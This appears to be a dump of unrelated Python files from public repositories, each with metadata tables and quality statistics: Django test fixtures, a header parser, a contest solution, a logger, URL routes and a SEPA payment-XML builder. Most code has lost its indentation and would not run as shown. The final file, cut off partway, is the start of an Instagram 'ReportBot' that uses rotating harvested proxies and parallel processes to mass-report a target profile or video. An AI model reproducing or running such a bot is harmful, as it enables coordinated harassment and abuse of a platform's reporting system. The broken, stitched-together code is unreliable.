@pytest.fixture
def space_resource(space_resource_type):
return Resource.objects.create(type=space_resource_type, authentication="none", name="resource")
@pytest.mark.django_db
@pytest.fixture
def test_unit():
return Unit.objects.create(name="unit", time_zone='Europe/Helsinki')
@pytest.fixture
def test_unit2():
return Unit.objects.create(name="unit 2", time_zone='Europe/Helsinki')
@pytest.fixture
def test_unit3():
return Unit.objects.create(name="unit 3", time_zone='Europe/Helsinki')
@pytest.fixture
def terms_of_use():
return TermsOfUse.objects.create(
name_fi='testikäyttöehdot',
name_en='test terms of use',
text_fi='kaikki on kielletty',
text_en='everything is forbidden',
)
@pytest.mark.django_db
@pytest.fixture
def resource_in_unit(space_resource_type, test_unit, terms_of_use):
return Resource.objects.create(
type=space_resource_type,
authentication="none",
name="resource in unit",
unit=test_unit,
max_reservations_per_user=1,
max_period=datetime.timedelta(hours=2),
reservable=True,
generic_terms=terms_of_use,
specific_terms_fi='spesifiset käyttöehdot',
specific_terms_en='specific terms of use',
reservation_confirmed_notification_extra_en='this resource rocks'
)
@pytest.mark.django_db
@pytest.fixture
def resource_in_unit2(space_resource_type, test_unit2):
return Resource.objects.create(
type=space_resource_type,
authentication="none",
name="resource in unit 2",
unit=test_unit2,
max_reservations_per_user=2,
max_period=datetime.timedelta(hours=4),
reservable=True,
)
@pytest.mark.django_db
@pytest.fixture
def resource_in_unit3(space_resource_type, test_unit3):
return Resource.objects.create(
type=space_resource_type,
authentication="none",
name="resource in unit 3",
unit=test_unit3,
max_reservations_per_user=2,
max_period=datetime.timedelta(hours=4),
reservable=True,
)
@pytest.mark.django_db
@pytest.fixture
def resource_with_opening_hours(resource_in_unit):
p1 = Period.objects.create(start=datetime.date(2115, 1, 1),
end=datetime.date(2115, 12, 31),
resource=resource_in_unit, name='regular hours')
for weekday in range(0, 7):
Day.objects.create(period=p1, weekday=weekday,
opens=datetime.time(8, 0),
closes=datetime.time(18, 0))
resource_in_unit.update_opening_hours()
return resource_in_unit
@pytest.mark.django_db
@pytest.fixture
def exceptional_period(resource_with_opening_hours):
parent = resource_with_opening_hours.periods.first()
period = Period.objects.create(start='2115-01-10', end='2115-01-12',
resource=resource_with_opening_hours,
name='exceptional hours',
exceptional=True, parent=parent)
date = period.start
Day.objects.create(period=period, weekday=date.weekday(),
closed=True)
date = date + datetime.timedelta(days=1)
Day.objects.create(period=period, weekday=date.weekday(),
opens='12:00', closes='13:00')
date = date + datetime.timedelta(days=1)
Day.objects.create(period=period, weekday=date.weekday(),
closed=True)
return period
@pytest.mark.django_db
@pytest.fixture
def equipment_category():
return EquipmentCategory.objects.create(
name='test equipment category'
)
@pytest.mark.django_db
@pytest.fixture
def equipment(equipment_category):
equipment = Equipment.objects.create(name='test equipment', category=equipment_category)
return equipment
@pytest.mark.django_db
@pytest.fixture
def equipment_alias(equipment):
equipment_alias = EquipmentAlias.objects.create(name='test equipment alias', language='fi', equipment=equipment)
return equipment_alias
@pytest.mark.django_db
@pytest.fixture
def resource_equipment(resource_in_unit, equipment):
data = {'test_key': 'test_value'}
resource_equipment = ResourceEquipment.objects.create(
equipment=equipment,
resource=resource_in_unit,
data=data,
description='test resource equipment',
)
return resource_equipment
@pytest.mark.django_db
@pytest.fixture
def user():
return get_user_model().objects.create(
username='test_user',
first_name='Cem',
last_name='Kaner',
email='cem@kaner.com',
preferred_language='en'
)
@pytest.mark.django_db
@pytest.fixture
def user2():
return get_user_model().objects.create(
username='test_user2',
first_name='Brendan',
last_name='Neutra',
email='brendan@neutra.com'
)
@pytest.mark.django_db
@pytest.fixture
def staff_user():
return get_user_model().objects.create(
username='test_staff_user',
first_name='John',
last_name='Staff',
email='john@staff.com',
is_staff=True,
preferred_language='en'
)
@pytest.mark.django_db
@pytest.fixture
def unit_manager_user(resource_in_unit):
user = get_user_model().objects.create(
username='test_manager_user',
first_name='Inspector',
last_name='Lestrade',
email='lestrade@scotlandyard.co.uk',
is_staff=True,
preferred_language='en'
)
user.unit_authorizations.create(subject=resource_in_unit.unit, level=UnitAuthorizationLevel.manager)
return user
@pytest.mark.django_db
@pytest.fixture
def general_admin():
return get_user_model().objects.create(
username='test_general_admin',
first_name='Genie',
last_name='Manager',
email='genie.manager@example.com',
is_staff=True,
is_general_admin=True,
preferred_language='en'
)
@pytest.mark.django_db
@pytest.fixture
def group():
return Group.objects.create(name='test group')
@pytest.mark.django_db
@pytest.fixture
def purpose():
return Purpose.objects.create(name='test purpose', id='test-purpose')
@pytest.fixture
def resource_group(resource_in_unit):
group = ResourceGroup.objects.create(
identifier='test_group',
name='Test resource group'
)
group.resources.set([resource_in_unit])
return group
@pytest.fixture
def resource_group2(resource_in_unit2):
group = ResourceGroup.objects.create(
identifier='test_group_2',
name='Test resource group 2'
)
group.resources.set([resource_in_unit2])
return group
@pytest.fixture
def test_municipality():
municipality = Municipality.objects.create(
id='foo',
name='Foo'
)
return municipality
@pytest.fixture
def accessibility_viewpoint_wheelchair():
vp = {"id": "10", "name_en": "I am a wheelchair user", "order_text": 10}
return AccessibilityViewpoint.objects.create(**vp)
@pytest.fixture
def accessibility_viewpoint_hearing():
vp = {"id": "20", "name_en": "I am hearing impaired", "order_text": 20}
return AccessibilityViewpoint.objects.create(**vp)
@pytest.fixture
def accessibility_value_green():
return AccessibilityValue.objects.create(value='green', order=10)
@pytest.fixture
def accessibility_value_red():
return AccessibilityValue.objects.create(value='red', order=-10)
@pytest.fixture
def resource_with_accessibility_data(resource_in_unit, accessibility_viewpoint_wheelchair,
accessibility_viewpoint_hearing, accessibility_value_green,
accessibility_value_red):
""" Resource is wheelchair accessible, not hearing accessible, unit is accessible to both """
ResourceAccessibility.objects.create(
resource=resource_in_unit,
viewpoint=accessibility_viewpoint_wheelchair,
value=accessibility_value_green
)
ResourceAccessibility.objects.create(
resource=resource_in_unit,
viewpoint=accessibility_viewpoint_hearing,
value=accessibility_value_red
)
UnitAccessibility.objects.create(
unit=resource_in_unit.unit,
viewpoint=accessibility_viewpoint_wheelchair,
value=accessibility_value_green
)
UnitAccessibility.objects.create(
unit=resource_in_unit.unit,
viewpoint=accessibility_viewpoint_hearing,
value=accessibility_value_green
)
return resource_in_unit
@pytest.fixture
def resource_with_accessibility_data2(resource_in_unit2, accessibility_viewpoint_wheelchair,
accessibility_viewpoint_hearing, accessibility_value_green,
accessibility_value_red):
""" Resource is hearing accessible, not wheelchair accessible, unit is accessible to both """
ResourceAccessibility.objects.create(
resource=resource_in_unit2,
viewpoint=accessibility_viewpoint_wheelchair,
value=accessibility_value_red
)
ResourceAccessibility.objects.create(
resource=resource_in_unit2,
viewpoint=accessibility_viewpoint_hearing,
value=accessibility_value_green
)
UnitAccessibility.objects.create(
unit=resource_in_unit2.unit,
viewpoint=accessibility_viewpoint_wheelchair,
value=accessibility_value_green
)
UnitAccessibility.objects.create(
unit=resource_in_unit2.unit,
viewpoint=accessibility_viewpoint_hearing,
value=accessibility_value_green
)
return resource_in_unit2
@pytest.fixture
def resource_with_accessibility_data3(resource_in_unit3, accessibility_viewpoint_wheelchair,
accessibility_viewpoint_hearing, accessibility_value_green,
accessibility_value_red):
""" Resource is accessible, unit is not """
ResourceAccessibility.objects.create(
resource=resource_in_unit3,
viewpoint=accessibility_viewpoint_wheelchair,
value=accessibility_value_green
)
ResourceAccessibility.objects.create(
resource=resource_in_unit3,
viewpoint=accessibility_viewpoint_hearing,
value=accessibility_value_green
)
UnitAccessibility.objects.create(
unit=resource_in_unit3.unit,
viewpoint=accessibility_viewpoint_wheelchair,
value=accessibility_value_red
)
UnitAccessibility.objects.create(
unit=resource_in_unit3.unit,
viewpoint=accessibility_viewpoint_hearing,
value=accessibility_value_red
)
    return resource_in_unit3
```
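
A sketch of how a test module in the same suite would consume these fixtures; the assertions simply restate values set in `resource_in_unit` above:

```python
import pytest

@pytest.mark.django_db
def test_resource_in_unit_defaults(resource_in_unit):
    # Values come straight from the fixture definition.
    assert resource_in_unit.max_reservations_per_user == 1
    assert resource_in_unit.unit.name == "unit"
    assert resource_in_unit.reservable
```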

avg_line_length 29.606796, max_line_length 119, alphanum_fraction 0.702492. Non-zero quality signals: num_words 1,374, num_chars 12,198, mean_word_length 5.983988, frac_words_unique 0.140466, frac_chars_top_2grams 0.069569, frac_chars_top_3grams 0.070056, frac_chars_top_4grams 0.041596, frac_chars_dupe_5grams 0.596935, frac_chars_dupe_6grams 0.550596, frac_chars_dupe_7grams 0.498662, frac_chars_dupe_8grams 0.456702, frac_chars_dupe_9grams 0.403308, frac_chars_dupe_10grams 0.334469, frac_chars_digital 0.010521, frac_chars_whitespace 0.205198, size_file_byte 12,198, num_lines 411, num_chars_line_max 120, num_chars_line_mean 29.678832, frac_chars_alphabet 0.837545, frac_chars_comments 0.019101, frac_lines_dupe_lines 0.478788, frac_chars_string_length 0.075429, frac_chars_long_word_length 0.004353, py:cate_ast 1, py:frac_lines_func_ratio 0.112121, py:cate_var_zero false, py:frac_lines_import 0.030303, py:frac_lines_simplefunc 0.060606, py:score_lines_no_logic 0.254545. All other quality-signal columns are 0; the raw `qsc_*` counters are all 0 (`frac_words_unique` and `frac_lines_string_concat` null); effective 1, hits 0.
Row 6:

| hexsha | size | ext | lang |
|---|---|---|---|
| 86468125b6e8c3a2e71c1dfdfd2e29f1c5b2af19 | 586 | py | Python |

| | repo_path | repo_name | head_hexsha | licenses | count | event_min_datetime | event_max_datetime |
|---|---|---|---|---|---|---|---|
| max_stars | qcmetadataprinter/struct.py | x2dev/device_leeco_x2 | 9bf4549b5f64390ca4da291745b2a66a8e3f006e | ["FTL"] | null | null | null |
| max_issues | qcmetadataprinter/struct.py | x2dev/device_leeco_x2 | 9bf4549b5f64390ca4da291745b2a66a8e3f006e | ["FTL"] | null | null | null |
| max_forks | qcmetadataprinter/struct.py | x2dev/device_leeco_x2 | 9bf4549b5f64390ca4da291745b2a66a8e3f006e | ["FTL"] | null | null | null |

content:

```python
#!/bin/python3
with open('../camera/QCamera2/stack/common/cam_intf.h', 'r') as f:
data = f.read()
f.closed  # no-op; the with block above has already closed the file
start = data.find(' INCLUDE(CAM_INTF_META_HISTOGRAM')
end = data.find('} metadata_data_t;')
data = data[start:end]
metadata = data.split("\n")
metalist = list()
for line in metadata:
if (line.startswith(' INCLUDE')):
foo = line.split(',')
foo[0] = foo[0].replace('INCLUDE', 'PRINT')
metalist.append(foo[0] + ", pMetadata);")
with open('list.txt', 'w') as f:
for item in metalist:
f.write("%s\n" % item)
f.closed  # no-op; the with block above has already closed the file
```
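
To make the rewrite concrete, here is the same split/replace logic applied to one illustrative header line (the actual `INCLUDE` entries live in `cam_intf.h`):

```python
line = '    INCLUDE(CAM_INTF_META_HISTOGRAM, histogram, 1);'
foo = line.split(',')
foo[0] = foo[0].replace('INCLUDE', 'PRINT')
print(foo[0] + ", pMetadata);")
# ->     PRINT(CAM_INTF_META_HISTOGRAM, pMetadata);
```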

avg_line_length 23.44, max_line_length 66, alphanum_fraction 0.593857. Non-zero quality signals: num_words 84, num_chars 586, mean_word_length 4.071429, frac_words_unique 0.535714, frac_chars_top_2grams 0.035088, frac_chars_digital 0.010846, frac_chars_whitespace 0.213311, size_file_byte 586, num_lines 24, num_chars_line_max 67, num_chars_line_mean 24.416667, frac_chars_alphabet 0.73102, frac_chars_comments 0.022184, frac_lines_dupe_lines 0.117647, frac_chars_string_length 0.263986, frac_chars_long_word_length 0.127622, py:cate_ast 1, py:cate_var_zero false. All other quality-signal columns are 0; the raw `qsc_*` counters are all 0 (`frac_words_unique` and `frac_lines_string_concat` null); effective 1, hits 0.
Row 7:

| hexsha | size | ext | lang |
|---|---|---|---|
| 8647521d4f7b0429f689d687206113be1ffbd603 | 317 | py | Python |

| | repo_path | repo_name | head_hexsha | licenses | count | event_min_datetime | event_max_datetime |
|---|---|---|---|---|---|---|---|
| max_stars | abc/abc121/abc121d-2.py | c-yan/atcoder | 940e49d576e6a2d734288fadaf368e486480a948 | ["MIT"] | 1 | 2019-08-21T00:49:34.000Z | 2019-08-21T00:49:34.000Z |
| max_issues | abc/abc121/abc121d-2.py | c-yan/atcoder | 940e49d576e6a2d734288fadaf368e486480a948 | ["MIT"] | null | null | null |
| max_forks | abc/abc121/abc121d-2.py | c-yan/atcoder | 940e49d576e6a2d734288fadaf368e486480a948 | ["MIT"] | null | null | null |

content:

```python
def g(A, n):
if A == -1:
return 0
return A // (2 * n) * n + max(A % (2 * n) - (n - 1), 0)
def f(A, B):
result = 0
for i in range(48):
t = 1 << i
if (g(B, t) - g(A - 1, t)) % 2 == 1:
result += t
return result
A, B = map(int, input().split())
print(f(A, B))
```
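
Reading of the solution: `g(A, n)` counts how many integers in `[0, A]` have bit `n` set (for `n` a power of two), so `f(A, B)` assembles, bit by bit, the XOR of all integers in `[A, B]` from the parity of those counts. A self-contained brute-force check of that claim:

```python
from functools import reduce
from operator import xor

def g(A, n):
    if A == -1:
        return 0
    return A // (2 * n) * n + max(A % (2 * n) - (n - 1), 0)

def f(A, B):
    # bit i of XOR(A..B) is the parity of how many x in [A, B] have bit i set
    return sum(1 << i for i in range(48)
               if (g(B, 1 << i) - g(A - 1, 1 << i)) % 2 == 1)

assert all(f(a, b) == reduce(xor, range(a, b + 1))
           for a in range(30) for b in range(a, 60))
```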

avg_line_length 16.684211, max_line_length 59, alphanum_fraction 0.381703. Non-zero quality signals: num_words 59, num_chars 317, mean_word_length 2.050847, frac_words_unique 0.40678, frac_chars_top_2grams 0.049587, frac_chars_top_3grams 0.049587, frac_chars_top_4grams 0.066116, frac_chars_digital 0.068783, frac_chars_whitespace 0.403785, size_file_byte 317, num_lines 18, num_chars_line_max 60, num_chars_line_mean 17.611111, frac_chars_alphabet 0.571429, py:cate_ast 1, py:frac_lines_func_ratio 0.153846, py:cate_var_zero false, py:score_lines_no_logic 0.384615, py:frac_lines_print 0.076923. All other quality-signal columns are 0; the raw `qsc_*` counters are all 0 (`frac_words_unique` and `frac_lines_string_concat` null); effective 1, hits 0.
Row 8:

| hexsha | size | ext | lang |
|---|---|---|---|
| 86479efec94998d8ac597979216e69bc35252174 | 807 | py | Python |

| | repo_path | repo_name | head_hexsha | licenses | count | event_min_datetime | event_max_datetime |
|---|---|---|---|---|---|---|---|
| max_stars | log_mysql.py | kizunai/Weather-Scrapy | d2104d28dc303f6710b043f9821dcb84c665665d | ["Apache-2.0"] | null | null | null |
| max_issues | log_mysql.py | kizunai/Weather-Scrapy | d2104d28dc303f6710b043f9821dcb84c665665d | ["Apache-2.0"] | null | null | null |
| max_forks | log_mysql.py | kizunai/Weather-Scrapy | d2104d28dc303f6710b043f9821dcb84c665665d | ["Apache-2.0"] | null | null | null |

content:

```python
import logging
from logging.handlers import TimedRotatingFileHandler
class MyLog():
def __init__(self, name, filename):
self.logger = logging.getLogger(name)
if not self.logger.handlers:
self.logger.setLevel(logging.INFO)
ch = TimedRotatingFileHandler(filename=filename, when='midnight', encoding="utf-8")
ch.setLevel(logging.DEBUG)
formatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s')
ch.setFormatter(formatter)
self.logger.addHandler(ch)
'''
logger = MyLog("test","log\\text.txt")
logger.logger.debug('debug message')
logger.logger.info('info message')
logger.logger.warning('warn message')
logger.logger.error('error message')
logger.logger.critical('critical message')
'''
```

avg_line_length 31.038462, max_line_length 97, alphanum_fraction 0.675341. Non-zero quality signals: num_words 91, num_chars 807, mean_word_length 5.945055, frac_words_unique 0.43956, frac_chars_top_2grams 0.110906, frac_chars_top_3grams 0.140481, frac_chars_digital 0.001517, frac_chars_whitespace 0.183395, size_file_byte 807, num_lines 25, num_chars_line_max 98, num_chars_line_mean 32.28, frac_chars_alphabet 0.819423, frac_chars_string_length 0.114236, py:cate_ast 1, py:frac_lines_func_ratio 0.083333, py:cate_var_zero false, py:frac_lines_import 0.166667, py:score_lines_no_logic 0.333333. All other quality-signal columns are 0; the raw `qsc_*` counters are all 0 (`frac_words_unique` and `frac_lines_string_concat` null); effective 1, hits 0.
Row 9:

| hexsha | size | ext | lang |
|---|---|---|---|
| 8647faa20530aa0d730c1a40c079c5454d72f20d | 1,252 | py | Python |

| | repo_path | repo_name | head_hexsha | licenses | count | event_min_datetime | event_max_datetime |
|---|---|---|---|---|---|---|---|
| max_stars | src/fiesta/urls.py | lerooze/django-fiesta | d521f50bcdd3d40e91f0474ec2fa7e256758e0a5 | ["BSD-3-Clause"] | null | null | null |
| max_issues | src/fiesta/urls.py | lerooze/django-fiesta | d521f50bcdd3d40e91f0474ec2fa7e256758e0a5 | ["BSD-3-Clause"] | 3 | 2019-10-29T23:31:01.000Z | 2020-03-31T03:08:28.000Z |
| max_forks | src/fiesta/urls.py | lerooze/django-fiesta | d521f50bcdd3d40e91f0474ec2fa7e256758e0a5 | ["BSD-3-Clause"] | null | null | null |

content:

```python
# urls.py
from django.urls import path, register_converter
from fiesta import converters
from fiesta.views import views
from rest_framework.urlpatterns import format_suffix_patterns
# "http://django-sdmx.org/wsrest/"
# "http://django-sdmx.org/ws/"
register_converter(converters.ResourceConverter, 'res')
register_converter(converters.AgencyConverter, 'age')
register_converter(converters.ContextConverter, 'con')
urlpatterns = [
path('wsreg/SubmitStructure/', views.SubmitStructureRequestView.as_view()),
path('wsrest/schema/<con:context>/<age:agencyID>/<str:resourceID>', views.SDMXRESTfulSchemaView.as_view()),
path('wsrest/schema/<con:context>/<age:agencyID>/<str:resourceID>/<str:version>', views.SDMXRESTfulSchemaView.as_view()),
path('wsrest/<res:resource>/', views.SDMXRESTfulStructureView.as_view()),
path('wsrest/<res:resource>/<age:agencyID>/',
views.SDMXRESTfulStructureView.as_view()),
path('wsrest/<res:resource>/<age:agencyID>/<str:resourceID>/',
views.SDMXRESTfulStructureView.as_view()),
path('wsrest/<res:resource>/<age:agencyID>/<str:resourceID>/'
'<str:version>/',
views.SDMXRESTfulStructureView.as_view()),
]
urlpatterns = format_suffix_patterns(urlpatterns)
```
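
The custom converters (`res`, `age`, `con`) come from `fiesta.converters`, which is not shown here. For orientation, a Django path converter is any class of this shape; the regex below is purely illustrative, not the real `AgencyConverter`:

```python
class AgencyConverter:
    """Matches an agency identifier segment and passes it through as str."""
    regex = '[A-Za-z0-9_]+'  # illustrative; the real pattern lives in fiesta.converters

    def to_python(self, value):
        return value

    def to_url(self, value):
        return value
```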

avg_line_length 40.387097, max_line_length 125, alphanum_fraction 0.742812. Non-zero quality signals: num_words 136, num_chars 1,252, mean_word_length 6.720588, frac_words_unique 0.308824, frac_chars_top_2grams 0.045952, frac_chars_top_3grams 0.065646, frac_chars_top_4grams 0.105033, frac_chars_dupe_5grams 0.484683, frac_chars_dupe_6grams 0.484683, frac_chars_dupe_7grams 0.40372, frac_chars_dupe_8grams 0.370897, frac_chars_dupe_9grams 0.370897, frac_chars_dupe_10grams 0.370897, frac_chars_whitespace 0.099042, size_file_byte 1,252, num_lines 30, num_chars_line_max 126, num_chars_line_mean 41.733333, frac_chars_alphabet 0.810284, frac_chars_comments 0.055112, frac_lines_dupe_lines 0.142857, frac_chars_string_length 0.29202, frac_chars_long_word_length 0.272496, py:cate_ast 1, py:cate_var_zero false, py:frac_lines_import 0.190476, py:score_lines_no_logic 0.190476. All other quality-signal columns are 0; the raw `qsc_*` counters are all 0 (`frac_words_unique` and `frac_lines_string_concat` null); effective 1, hits 0.
Row 10:

| hexsha | size | ext | lang |
|---|---|---|---|
| 864838cbb6dc59b795206fdcacaeae0f4be0ca16 | 9,159 | py | Python |

| | repo_path | repo_name | head_hexsha | licenses | count | event_min_datetime | event_max_datetime |
|---|---|---|---|---|---|---|---|
| max_stars | sepa_generator/definitions.py | jason-gm/python_sepa | 542c48326c07ab68d341a07d5ee12502f7248690 | ["MIT"] | null | null | null |
| max_issues | sepa_generator/definitions.py | jason-gm/python_sepa | 542c48326c07ab68d341a07d5ee12502f7248690 | ["MIT"] | null | null | null |
| max_forks | sepa_generator/definitions.py | jason-gm/python_sepa | 542c48326c07ab68d341a07d5ee12502f7248690 | ["MIT"] | null | null | null |

content:

```python
def construct_tag_data(tag_name, attrs=None, value=None, sorting=None):
data = {
'_name': tag_name,
'_attrs': attrs or [],
'_value': value,
}
if sorting:
data['_sorting'] = sorting
return data
def add_simple_child(data, child_friendly_name, child_tag_name, child_attrs=None, child_value=None):
data[child_friendly_name] = construct_tag_data(child_tag_name, child_attrs, child_value)
return data
def construct_header(ctransfer):
header = construct_tag_data('GrpHdr')
header['_sorting'] = ['MsgId', 'CreDtTm', 'NbOfTxs', 'CtrlSum', 'InitgPty']
header['message_id'] = construct_tag_data('MsgId', value=ctransfer.uuid)
header['creation_date_time'] = construct_tag_data('CreDtTm', value=ctransfer.timestamp)
header['num_transactions'] = construct_tag_data('NbOfTxs', value=ctransfer.get_num_of_transactions())
header['control_sum'] = construct_tag_data('CtrlSum', value=ctransfer.get_control_sum())
header['initiating_party'] = add_simple_child(construct_tag_data('InitgPty'), 'name', 'Nm', [],
ctransfer.debtor.name)
return header
def construct_iban(account, tag_name):
iban_data = construct_tag_data(tag_name)
iban_data['id'] = add_simple_child(construct_tag_data('Id'), 'iban', 'IBAN', [], account.iban)
return iban_data
def construct_bic(account, tag_name):
bic_data = construct_tag_data(tag_name)
bic_data['financial_instrument_id'] = add_simple_child(construct_tag_data('FinInstnId'), 'bic', 'BIC', [],
account.bic)
return bic_data
def construct_address_data(account, tag_name):
addr_data = construct_tag_data(tag_name)
addr_data['name'] = construct_tag_data('Nm', value=account.name)
if account.has_address():
address = construct_tag_data('PstlAdr')
if account.country:
address['country'] = construct_tag_data('Ctry', value=account.country)
if account.street:
address['addr_line_1'] = construct_tag_data('AdrLine', value=account.street)
if account.postcode and account.city:
address['addr_line_2'] = construct_tag_data('AdrLine', value="%s %s" % (account.postcode, account.city))
addr_data['address'] = address
return addr_data
def construct_transaction_data(ctransfer, transaction):
transaction_information = construct_tag_data('CdtTrfTxInf')
transaction_information['_sorting'] = ['PmtId', 'Amt', 'ChrgBr', 'UltmtDbtr', 'CdtrAgt', 'Cdtr', 'CdtrAcct',
'UltmtCdtr', 'Purp', 'RmtInf']
transaction_information['payment_id'] = add_simple_child(
data=add_simple_child(data=construct_tag_data('PmtId', sorting=['InstrId', 'EndToEndId']),
child_friendly_name='instruction',
child_tag_name='InstrId',
child_value=transaction.uuid),
child_friendly_name='eref',
child_tag_name='EndToEndId',
child_value=transaction.eref)
transaction_information['amount'] = add_simple_child(data=construct_tag_data('Amt'),
child_friendly_name='amount',
child_tag_name='InstdAmt',
child_attrs=[('Ccy', ctransfer.currency)],
child_value=transaction.get_amount())
transaction_information['charge_bearer'] = construct_tag_data('ChrgBr', value='SLEV')
if ctransfer.debtor.use_ultimate:
transaction_information['ultimate_debtor'] = add_simple_child(data=construct_tag_data('UltmtDbtr'),
child_friendly_name='name',
child_tag_name='Nm',
child_value=ctransfer.debtor.name)
transaction_information['creditor_agent'] = construct_bic(transaction.creditor, 'CdtrAgt')
transaction_information['creditor_data'] = construct_address_data(transaction.creditor, 'Cdtr')
transaction_information['creditor_account'] = construct_iban(transaction.creditor, 'CdtrAcct')
if transaction.creditor.use_ultimate:
transaction_information['ultimate_creditor'] = add_simple_child(data=construct_tag_data('UltmtCdtr'),
child_friendly_name='name',
child_tag_name='Nm',
child_value=transaction.creditor.name)
transaction_information['purpose'] = add_simple_child(data=construct_tag_data('Purp'),
child_friendly_name='code',
child_tag_name='Cd',
child_value=transaction.ext_purpose)
if not transaction.use_structured:
transaction_information['remote_inf'] = add_simple_child(data=construct_tag_data('RmtInf'),
child_friendly_name='unstructured',
child_tag_name='Ustrd',
child_value=transaction.purpose)
else:
rmt_inf = construct_tag_data('RmtInf')
rmt_inf_strd = add_simple_child(data=construct_tag_data('Strd'),
child_friendly_name='additional_info',
child_tag_name='AddtlRmtInf',
child_value=transaction.purpose)
rmt_tp = construct_tag_data('Tp')
rmt_tp['code_or_property'] = add_simple_child(data=construct_tag_data('CdOrPrtry'),
child_friendly_name='code',
child_tag_name='Cd',
child_value='SCOR')
rmt_creditor_ref_inf = add_simple_child(data=construct_tag_data('CdtrRefInf'),
child_friendly_name='reference',
child_tag_name='Ref',
child_value=transaction.cref)
rmt_creditor_ref_inf['tp'] = rmt_tp
rmt_inf_strd['creditor_ref_information'] = rmt_creditor_ref_inf
rmt_inf['structured'] = rmt_inf_strd
transaction_information['remote_inf'] = rmt_inf
return transaction_information
def construct_payment_information(ctransfer):
payment_inf = construct_tag_data('PmtInf')
payment_inf['_sorting'] = ['PmtInfId', 'PmtMtd', 'BtchBookg', 'NbOfTxs', 'CtrlSum', 'PmtTpInf', 'ReqdExctnDt',
'Dbtr', 'DbtrAcct', 'DbtrAgt', 'ChrgBr', 'CdtTrfTxInf']
payment_inf['payment_id'] = construct_tag_data('PmtInfId', value=ctransfer.payment_id)
payment_inf['payment_method'] = construct_tag_data('PmtMtd', value='TRF')
payment_inf['batch'] = construct_tag_data('BtchBookg', value=str(ctransfer.batch).lower())
payment_inf['num_transactions'] = construct_tag_data('NbOfTxs', value=ctransfer.get_num_of_transactions())
payment_inf['control_sum'] = construct_tag_data('CtrlSum', value=ctransfer.get_control_sum())
payment_instruction = construct_tag_data('PmtTpInf')
payment_instruction['_sorting'] = ['InstrPrty', 'SvcLvl']
payment_instruction['priority'] = construct_tag_data('InstrPrty', value='NORM')
payment_instruction['service_level'] = add_simple_child(construct_tag_data('SvcLvl'), 'code', 'Cd', [], 'SEPA')
payment_inf['instruction'] = payment_instruction
payment_inf['requested_execution_time'] = construct_tag_data('ReqdExctnDt', value=ctransfer.execution_time)
payment_inf['debtor'] = construct_address_data(ctransfer.debtor, 'Dbtr')
payment_inf['debtor_account'] = construct_iban(ctransfer.debtor, 'DbtrAcct')
payment_inf['debtor_agent'] = construct_bic(ctransfer.debtor, 'DbtrAgt')
payment_inf['charge_bearer'] = construct_tag_data('ChrgBr', value='SLEV')
for i, payment in enumerate(ctransfer.transactions):
transfer_information = construct_transaction_data(ctransfer, payment)
payment_inf['transfer_no_%s' % i] = transfer_information
return payment_inf
def construct_document(ctransfer):
root = construct_tag_data('Document', [('xmlns', 'urn:iso:std:iso:20022:tech:xsd:pain.001.001.03')])
message = construct_tag_data('CstmrCdtTrfInitn')
message['_sorting'] = ['GrpHdr', 'PmtInf']
message['header'] = construct_header(ctransfer)
message['payment_information'] = construct_payment_information(ctransfer)
root['message'] = message
    return root
```
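
The builders above produce plain nested dicts, with `_name`/`_attrs`/`_value` bookkeeping keys and `_sorting` for element order, which a separate serializer presumably walks to emit the pain.001 XML. Assuming the two helpers defined above are in scope, an illustrative value:

```python
data = add_simple_child(construct_tag_data('InitgPty'), 'name', 'Nm', [], 'ACME Corp')
# {'_name': 'InitgPty', '_attrs': [], '_value': None,
#  'name': {'_name': 'Nm', '_attrs': [], '_value': 'ACME Corp'}}
```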

avg_line_length 48.460317, max_line_length 116, alphanum_fraction 0.601048. Non-zero quality signals: num_words 902, num_chars 9,159, mean_word_length 5.720621, frac_words_unique 0.174058, frac_chars_top_2grams 0.102326, frac_chars_top_3grams 0.136434, frac_chars_top_4grams 0.046512, frac_chars_dupe_5grams 0.242636, frac_chars_dupe_6grams 0.202907, frac_chars_dupe_7grams 0.175581, frac_chars_dupe_8grams 0.117054, frac_chars_dupe_9grams 0.086047, frac_chars_dupe_10grams 0.086047, frac_chars_digital 0.002314, frac_chars_whitespace 0.292172, size_file_byte 9,159, num_lines 188, num_chars_line_max 117, num_chars_line_mean 48.718085, frac_chars_alphabet 0.793614, frac_lines_dupe_lines 0.088889, frac_lines_long_string 0.007407, frac_chars_string_length 0.148395, frac_chars_long_word_length 0.012776, py:cate_ast 1, py:frac_lines_func_ratio 0.066667, py:cate_var_zero false, py:score_lines_no_logic 0.133333. All other quality-signal columns are 0; the raw `qsc_*` counters are all 0 (`frac_words_unique` and `frac_lines_string_concat` null); effective 1, hits 0.
Row 11:

| hexsha | size | ext | lang |
|---|---|---|---|
| 864bf69490c6ee45920463f0c6f8b0b6dbff18dc | 4,624 | py | Python |

| | repo_path | repo_name | head_hexsha | licenses | count | event_min_datetime | event_max_datetime |
|---|---|---|---|---|---|---|---|
| max_stars | ReportBot.py | SeveNNoff/InstagramReportBot | 0a613b5f2733d988a952d64d8141cb7390527b9e | ["Apache-2.0"] | 1 | 2020-10-13T16:04:08.000Z | 2020-10-13T16:04:08.000Z |
| max_issues | ReportBot.py | SeveNNoff/InstagramReportBot | 0a613b5f2733d988a952d64d8141cb7390527b9e | ["Apache-2.0"] | null | null | null |
| max_forks | ReportBot.py | SeveNNoff/InstagramReportBot | 0a613b5f2733d988a952d64d8141cb7390527b9e | ["Apache-2.0"] | 1 | 2021-04-17T04:42:29.000Z | 2021-04-17T04:42:29.000Z |

content:

```python
# coding=utf-8
#!/usr/bin/env python3
from libs.check_modules import check_modules
from sys import exit
from os import _exit
check_modules()
from os import path
from libs.logo import print_logo
from libs.utils import print_success
from libs.utils import print_error
from libs.utils import ask_question
from libs.utils import print_status
from libs.utils import parse_proxy_file
from libs.proxy_harvester import find_proxies
from libs.attack import report_profile_attack
from libs.attack import report_video_attack
from multiprocessing import Process
from colorama import Fore, Back, Style
def chunks(lst, n):
"""Yield successive n-sized chunks from lst."""
for i in range(0, len(lst), n):
yield lst[i:i + n]
def profile_attack_process(username, proxy_list):
if (len(proxy_list) == 0):
for _ in range(10):
report_profile_attack(username, None)
return
for proxy in proxy_list:
report_profile_attack(username, proxy)
def video_attack_process(video_url, proxy_list):
if (len(proxy_list) == 0):
for _ in range(10):
report_video_attack(video_url, None)
return
for proxy in proxy_list:
report_video_attack(video_url, proxy)
def video_attack(proxies):
video_url = ask_question("Enter the link of the video you want to report")
print(Style.RESET_ALL)
if (len(proxies) == 0):
for k in range(5):
p = Process(target=video_attack_process, args=(video_url, [],))
p.start()
